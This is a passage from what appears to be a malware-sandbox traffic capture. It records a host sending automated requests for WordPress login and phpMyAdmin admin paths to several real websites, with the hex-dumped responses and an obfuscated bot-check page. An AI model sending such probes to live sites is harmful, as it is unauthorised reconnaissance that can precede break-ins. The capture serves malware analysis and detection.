text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])
Feb 21, 2024 00:26:11.302125931 CET	493	IN	Data Raw: 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d Data Ascii: +(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentL
Feb 21, 2024 00:26:11.302154064 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
234	192.168.2.6	59583	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.126147985 CET	174	OUT	GET /wp-login.php HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.219409943 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:11 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: Gtev1tWy/haFqglkz Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c
Feb 21, 2024 00:26:11.219438076 CET	1276	IN	Data Raw: 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: olor: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family: 'Clarkson'; font-
Feb 21, 2024 00:26:11.219480038 CET	1276	IN	Data Raw: 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 31 75 6f 5a 46 46 49 77 58 30 76 79 48 75 45 6a 48 59 48 32 56 6d 72 Data Ascii: LWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMttrEh8jq70i9RKy000O7s/J2
Feb 21, 2024 00:26:11.219486952 CET	268	IN	Data Raw: 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 59 51 4c 64 5a 47 75 47 6a 75 6d 36 37 4f 36 76 73 34 70 7a 6e 4e 4e Data Ascii: xqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+rKdvVh6f1F0Y/zD8P1sa53N
Feb 21, 2024 00:26:11.219536066 CET	1276	IN	Data Raw: 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 Data Ascii: 4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhwp5nBV/y
Feb 21, 2024 00:26:11.219594002 CET	1276	IN	Data Raw: 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a 31 4b 74 35 6c 47 73 76 61 68 79 6a 4d 75 52 56 48 49 4e 4b 49 41 53 Data Ascii: b3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFIiJPGPnKHYK2JjCRhQbe7Dxt
Feb 21, 2024 00:26:11.219607115 CET	1276	IN	Data Raw: 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 2f 4d 30 39 6b 66 67 47 63 66 7a 42 4f 77 72 79 52 61 56 44 73 36 44 Data Ascii: JIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2uE5F6+znJOlnPHleN2O10143
Feb 21, 2024 00:26:11.219706059 CET	1276	IN	Data Raw: 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 78 47 4f 70 71 4a 4c 78 51 45 50 50 38 65 62 6b 68 32 78 6a 78 50 73 Data Ascii: ZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3jzHBrGuPR1YpMFFrB1bJ8us
Feb 21, 2024 00:26:11.219712973 CET	1276	IN	Data Raw: 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 6d 38 78 79 37 34 61 37 52 49 71 32 52 79 68 4c 4c 71 34 76 45 4e 78 Data Ascii: KKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOYMOd3ZMy3lBovUZqA+G9Ip1V
Feb 21, 2024 00:26:11.219727039 CET	1276	IN	Data Raw: 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 59 57 74 62 4f 4d 45 64 72 4b 62 50 65 78 6c 48 77 64 34 48 69 2f 67 Data Ascii: W9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBWNubh73czs77OmucVf3h6/Pn
Feb 21, 2024 00:26:11.309247971 CET	1276	IN	Data Raw: 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 59 36 63 35 53 4e 6e 32 63 68 5a 4c 72 37 35 4d 79 53 4d 55 44 65 44 Data Ascii: /qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMfwYCj9K4ceU8KMt/MiGH+nwo
Feb 21, 2024 00:26:11.401904106 CET	214	OUT	GET /wp-admin/ HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://mwpmedia.com/wp-login.php
Feb 21, 2024 00:26:11.494476080 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:11 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: Gtev1tWy/Y1Q2e3AA Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c

Session ID	Source IP	Source Port	Destination IP	Destination Port
235	192.168.2.6	59454	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.137273073 CET	175	OUT	GET /pma/ HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.300738096 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port
236	192.168.2.6	59627	185.230.63.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.182972908 CET	178	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: sportclinic.co.il Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
